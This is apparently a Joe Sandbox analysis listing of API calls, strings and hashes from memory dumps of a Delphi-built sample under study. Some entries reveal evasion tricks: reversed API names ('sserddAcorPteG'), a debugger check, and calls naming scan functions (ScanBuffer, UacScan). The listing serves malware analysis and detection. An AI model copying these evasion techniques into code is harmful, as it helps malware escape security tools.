                                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                        • API String ID: 1646373207-1918263038
                                                                                        • Opcode ID: a14e6d1fce776ea0c8140a400593bde20454c2423af50513e836a1aaec06f4d6
                                                                                        • Instruction ID: 70082f25d28e397680997710b4296ada3d3d00ab7a2de472876329938869d6bb
                                                                                        • Opcode Fuzzy Hash: a14e6d1fce776ea0c8140a400593bde20454c2423af50513e836a1aaec06f4d6
                                                                                        • Instruction Fuzzy Hash: F241ABB7A893085B56366BBD740462BB7FED644B143A3863AF404CB784DE30FC55CA29
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 027E6EDE
                                                                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 027E6EEF
                                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 027E6EFF
                                                                                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 027E6F0F
                                                                                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 027E6F1F
                                                                                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 027E6F2F
                                                                                        • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 027E6F3F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                        • API String ID: 667068680-2233174745
                                                                                        • Opcode ID: bb1ab7cc17eea2f7dece04f9b20df101042e005921d67c2445baeaf65b8a7f85
                                                                                        • Instruction ID: 5f6582be247d842eeb57bc76840c464108304e83433aa26b8a28331dd437f19b
                                                                                        • Opcode Fuzzy Hash: bb1ab7cc17eea2f7dece04f9b20df101042e005921d67c2445baeaf65b8a7f85
                                                                                        • Instruction Fuzzy Hash: FAF04CE4A8C380BEBE41BB746C85C363F6DE539A043005C96BA4355552F77598148F76
                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 027D28CE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                        • API String ID: 2030045667-32948583
                                                                                        • Opcode ID: 89c3fb16abc998b7cc9a6af137fb7ce23d7140d6eddcba614584460fc8a2682b
                                                                                        • Instruction ID: 37ccfbb4b12e3cc2aae05fecf055aca71778cf63c419eb97f48cacf89b4f00ba
                                                                                        • Opcode Fuzzy Hash: 89c3fb16abc998b7cc9a6af137fb7ce23d7140d6eddcba614584460fc8a2682b
                                                                                        • Instruction Fuzzy Hash: 6EA1D430A042648FDB22AA2CCC84B99BAF5EB09350F1441F5DD49AB287CB7589C7CF51
                                                                                        Strings
                                                                                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 027D2849
                                                                                        • An unexpected memory leak has occurred. , xrefs: 027D2690
                                                                                        • bytes: , xrefs: 027D275D
                                                                                        • 7, xrefs: 027D26A1
                                                                                        • Unexpected Memory Leak, xrefs: 027D28C0
                                                                                        • , xrefs: 027D2814
                                                                                        • The unexpected small block leaks are:, xrefs: 027D2707
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                        • API String ID: 0-2723507874
                                                                                        • Opcode ID: 604229bb671283c532758d19730ceab8b16d461e07898c1665cc70336f383952
                                                                                        • Instruction ID: 088807f612704a6f3a62dbdc8f4d924b73046c39931cc7bf99b782c2e2d59798
                                                                                        • Opcode Fuzzy Hash: 604229bb671283c532758d19730ceab8b16d461e07898c1665cc70336f383952
                                                                                        • Instruction Fuzzy Hash: E771C430A042688FDB229A2CCC84BD9BAF5EB09714F5441E5D949EB283DB7549C7CF51
                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(00000000,027DC08B,?,?,00000000,00000000), ref: 027DBDF6
                                                                                          • Part of subcall function 027DA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DA7E2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$InfoThread
                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                        • API String ID: 4232894706-2493093252
                                                                                        • Opcode ID: 9fec6a6024d47c481c217b8d4bce9920b6805c141a9ae71808601244ba0374c0
                                                                                        • Instruction ID: 88f842d5298c3c1cc6d1f45ab7f941d6e89d60cc143101da875deb86fb00df64
                                                                                        • Opcode Fuzzy Hash: 9fec6a6024d47c481c217b8d4bce9920b6805c141a9ae71808601244ba0374c0
                                                                                        • Instruction Fuzzy Hash: 19614234B001589BDB06EBA4DC54A9FB7B7EF88300F519839E101EB645DA39D94ACBA1
                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 027EAEB8
                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 027EAECF
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 027EAF63
                                                                                        • IsBadReadPtr.KERNEL32(?,00000002), ref: 027EAF6F
                                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 027EAF83
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Read$HandleModule
                                                                                        • String ID: KernelBase$LoadLibraryExA
                                                                                        • API String ID: 2226866862-113032527
                                                                                        • Opcode ID: 06c620b85456ec196bcb8c87b19b52a1e104e13b66f590e99ba4a26b7e74322e
                                                                                        • Instruction ID: f5512ac820a2f2d4f168ef4a3e9ae1f1230271d894c348c1ea741b6d64146020
                                                                                        • Opcode Fuzzy Hash: 06c620b85456ec196bcb8c87b19b52a1e104e13b66f590e99ba4a26b7e74322e
                                                                                        • Instruction Fuzzy Hash: C8314FB6A40305BBDF21DB68CC85F5A77A8AF09728F044154FA16AB2C1D370E950CBB2
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027D4423,?,?,0282A7C8,?,?,027FE7A8,027D65B1,027FD30D), ref: 027D4395
                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027D4423,?,?,0282A7C8,?,?,027FE7A8,027D65B1,027FD30D), ref: 027D439B
                                                                                        • GetStdHandle.KERNEL32(000000F5,027D43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027D4423,?,?,0282A7C8), ref: 027D43B0
                                                                                        • WriteFile.KERNEL32(00000000,000000F5,027D43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027D4423,?,?), ref: 027D43B6
                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 027D43D4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHandleWrite$Message
                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                        • API String ID: 1570097196-2970929446
                                                                                        • Opcode ID: b796623d49067b6c77172796d35e003ec3a320245d8e81b72a2d8cb60b48c800
                                                                                        • Instruction ID: ff6cf0c2e71c4ba2a26a0b189fab061016cc5625eceeaf450458219761258286
                                                                                        • Opcode Fuzzy Hash: b796623d49067b6c77172796d35e003ec3a320245d8e81b72a2d8cb60b48c800
                                                                                        • Instruction Fuzzy Hash: F4F0B4A9AC8341BBFF21A2A4EC5AF592B7D8744F21F508A05B324B40D187F448C89B36
                                                                                        APIs
                                                                                          • Part of subcall function 027DAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 027DAD59
                                                                                          • Part of subcall function 027DAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027DAD7D
                                                                                          • Part of subcall function 027DAD3C: GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027DAD98
                                                                                          • Part of subcall function 027DAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027DAE2E
                                                                                        • CharToOemA.USER32(?,?), ref: 027DAEFB
                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 027DAF18
                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027DAF1E
                                                                                        • GetStdHandle.KERNEL32(000000F4,027DAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027DAF33
                                                                                        • WriteFile.KERNEL32(00000000,000000F4,027DAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027DAF39
                                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 027DAF5B
                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 027DAF71
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 185507032-0
                                                                                        • Opcode ID: d9aa5f5f1175ec19bed18aa54b61592d3b763fcdb74dc7a6cd5eb4a79d7efde0
                                                                                        • Instruction ID: 743cbbdacb28089415e977d9d5b26c4270a8bb78df94852e1c2ca67e19fc21bf
                                                                                        • Opcode Fuzzy Hash: d9aa5f5f1175ec19bed18aa54b61592d3b763fcdb74dc7a6cd5eb4a79d7efde0
                                                                                        • Instruction Fuzzy Hash: DD11CEB6544304BED302FBA4DC89F9B77FDAB45310F804A56B754D60E1DB71E9048B62
                                                                                        APIs
                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027DE625
                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027DE641
                                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 027DE67A
                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027DE6F7
                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 027DE710
                                                                                        • VariantCopy.OLEAUT32(?,00000000), ref: 027DE745
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                        • String ID:
                                                                                        • API String ID: 351091851-0
                                                                                        • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                        • Instruction ID: 7bd527e0e0c8703d91f91903a2e2ea69a9bb1dd586759c9b0cc75b2ffb61a889
                                                                                        • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                        • Instruction Fuzzy Hash: 5251087690162D9BCB23DF58CD84BDAB3BDAF49340F4041D5EA09EB211DA30AF858F61
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D35BA
                                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,027D3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D35ED
                                                                                        • RegCloseKey.ADVAPI32(?,027D3610,00000000,?,00000004,00000000,027D3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D3603
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                        • API String ID: 3677997916-4173385793
                                                                                        • Opcode ID: 185313a2c37615418dd9b1b71fcf990e89bdea35448d8404ca01ab8ace3adf16
                                                                                        • Instruction ID: c27e3796698de86e194699b31592330d8ac58edca0a380a351e7b5e6ccedf919
                                                                                        • Opcode Fuzzy Hash: 185313a2c37615418dd9b1b71fcf990e89bdea35448d8404ca01ab8ace3adf16
                                                                                        • Instruction Fuzzy Hash: 6E01D8B9A44318BAFB11DFD0CD02BBE77FCD708B00F5045A5BA04D6680E675A510CF69
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                        • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: Kernel32$sserddAcorPteG
                                                                                        • API String ID: 667068680-1372893251
                                                                                        • Opcode ID: 2844e513c1ec104cc2265e8769cc04537e5b78e3c2db960656d5d180cfc9a287
                                                                                        • Instruction ID: fd39fc0b52149a55f8493ece1f93bff8fb07196b4e6632310311ddaaf63991aa
                                                                                        • Opcode Fuzzy Hash: 2844e513c1ec104cc2265e8769cc04537e5b78e3c2db960656d5d180cfc9a287
                                                                                        • Instruction Fuzzy Hash: 0901A278A00304AFEB11EBA4E959F5EBBFEEB4C710F528464F401D7650E670A9048A29
                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(?,00000000,027DAAE7,?,?,00000000), ref: 027DAA68
                                                                                          • Part of subcall function 027DA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DA7E2
                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,027DAAE7,?,?,00000000), ref: 027DAA98
                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 027DAAA3
                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,027DAAE7,?,?,00000000), ref: 027DAAC1
                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 027DAACC
                                                                                        Similarity
                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                        • String ID:
                                                                                        • API String ID: 4102113445-0
                                                                                        • Opcode ID: 3e3ebf1b5b2565c7f2de934d6fcdc958768450a4fec57db1aceb26aef737e290
                                                                                        • Instruction ID: 1277ce96d7cde28e03fb2ac13cd69d9b80c524979933b44ff7f3e03187582979
                                                                                        • Opcode Fuzzy Hash: 3e3ebf1b5b2565c7f2de934d6fcdc958768450a4fec57db1aceb26aef737e290
                                                                                        • Instruction Fuzzy Hash: 3501A2B93006446FFB13BA64DE15F6A7B7DEB86720F510660F500E66C0E7759E008A69
                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(?,00000000,027DACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 027DAB2F
                                                                                          • Part of subcall function 027DA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DA7E2
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Locale$InfoThread
                                                                                        • String ID: eeee$ggg$yyyy
                                                                                        • API String ID: 4232894706-1253427255
                                                                                        • Opcode ID: d42fc47b40e6f462fd094d4f62fd8d5bbe5d65660105b81fa72c9e86ee2d9fa2
                                                                                        • Instruction ID: 2de360123cb5602814f48616c42eb96fd8fcc4efdef941c032edfbbbe998c3d3
                                                                                        • Opcode Fuzzy Hash: d42fc47b40e6f462fd094d4f62fd8d5bbe5d65660105b81fa72c9e86ee2d9fa2
                                                                                        • Instruction Fuzzy Hash: 5C4123717042054BDB13EB78C9A86BEB7FBFF81220B554921D48AD3344EB34EE02CA25
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc
                                                                                        • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                        • API String ID: 1883125708-1952140341
                                                                                        • Opcode ID: a5adfeb4742629147d57f7499e6ff50c61e0dd019a338d26936c95f6f069e43d
                                                                                        • Instruction ID: 5dcdcf7fdd8ffc6f036872a8f3bf609731811b01a9d0f1a0faf840b35b040c00
                                                                                        • Opcode Fuzzy Hash: a5adfeb4742629147d57f7499e6ff50c61e0dd019a338d26936c95f6f069e43d
                                                                                        • Instruction Fuzzy Hash: D6F0F078600308AFEB02EFA0DD5AA2ABBEDFB0DB04B524464F402D3660D770AD008A35
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,?,027EFDE0,UacInitialize,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanString), ref: 027EF9E2
                                                                                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 027EF9F4
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: IsDebuggerPresent$KernelBase
                                                                                        • API String ID: 1646373207-2367923768
                                                                                        • Opcode ID: da56a962c13dbaa468dac8671789dcc0fb3aa0f4b3a5c334a77f85d1492558f6
                                                                                        • Instruction ID: b718575c31dd4683f323e014962bfa162dbec2dd4558f7afd2e8938002889d10
                                                                                        • Opcode Fuzzy Hash: da56a962c13dbaa468dac8671789dcc0fb3aa0f4b3a5c334a77f85d1492558f6
                                                                                        • Instruction Fuzzy Hash: D0D012E63603801EFE00B2F42CC881D038CC91E92E3200E62F027DA8A2F6A68811502A
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,027FD10B,00000000,027FD11E), ref: 027DC47A
                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 027DC48B
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                        • API String ID: 1646373207-3712701948
                                                                                        • Opcode ID: 60c5508f0ac7860d5648adf5f4b6ae2b59ecffe4574cad7e819eca82ce4b674e
                                                                                        • Instruction ID: fa4be13551dce5d95d75014b54820c2170e3d9fc75dada844b2c893d9a7de70d
                                                                                        • Opcode Fuzzy Hash: 60c5508f0ac7860d5648adf5f4b6ae2b59ecffe4574cad7e819eca82ce4b674e
                                                                                        • Instruction Fuzzy Hash: C0D05EE0A443045BEA42BAB1A5856312FB88308314B04986FE50186110E7726410CF15
                                                                                        APIs
                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027DE297
                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027DE2B3
                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027DE32A
                                                                                        • VariantClear.OLEAUT32(?), ref: 027DE353
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                        • String ID:
                                                                                        • API String ID: 920484758-0
                                                                                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                        • Instruction ID: 69a9c782a50049b450c638060455831e719d60c0dda772e847a290a54296c443
                                                                                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                        • Instruction Fuzzy Hash: B7410875A016299FCB63DF58CD94BDAB3BDAF49314F4042D5E648AB211DA30AF80CF60
                                                                                        APIs
                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027DAD59
                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027DAD7D
                                                                                        • GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027DAD98
                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027DAE2E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3990497365-0
                                                                                        • Opcode ID: 1583ebec2a28562c5ed6cc76fe25e5756477f5ea1240ec16dfdccab7ffbbb413
                                                                                        • Instruction ID: ff6491842e4d0800642674599ed5f564fb04a1a99d43936b249b24c360195cce
                                                                                        • Opcode Fuzzy Hash: 1583ebec2a28562c5ed6cc76fe25e5756477f5ea1240ec16dfdccab7ffbbb413
                                                                                        • Instruction Fuzzy Hash: 20414C74A402589FDB22EB68DC89BDAB7FDAB08300F4440E6A548E7345DB70AF84CF55
                                                                                        APIs
                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027DAD59
                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027DAD7D
                                                                                        • GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027DAD98
                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027DAE2E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
